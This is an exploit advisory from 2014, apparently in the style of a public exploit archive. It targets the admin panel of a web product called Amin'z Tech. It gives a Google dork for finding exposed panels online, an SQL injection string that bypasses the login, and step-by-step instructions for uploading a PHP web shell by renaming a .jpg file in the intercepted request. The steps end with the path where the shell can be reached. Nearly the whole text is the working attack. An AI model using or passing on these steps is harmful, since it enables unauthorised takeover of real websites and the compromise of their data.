----------------------------------------------
# Exploit Title : Amin'z Tech Login Page SQL Injection Bypass / Upload
shell vulnerability

# Exploit Author : ACC3SS

# Vendor Homepage : http://www.aminztech.com

# Google Dork : intext:"AMIN'Z TECH" inurl:panel

# Date: 2014-01-16

# Tested on: Windows 7
------------------------------------------------
# Bypass Login Page :
# Location : localhost/panel/
# User ID: '=' 'or'
# Password: '=' 'or'
-------------------------------------
# Shell Upload :
# 1- Login
# 2- Go to address : : localhost/panel/emsection.php?MsID=1&LngID=en
# 3- upload shell (jpg format)
# 4- change format With live http headers : jpg to php
# 5- Shell Address : localhost/panel/upload/desc/main_1.php
-----------------------------------------------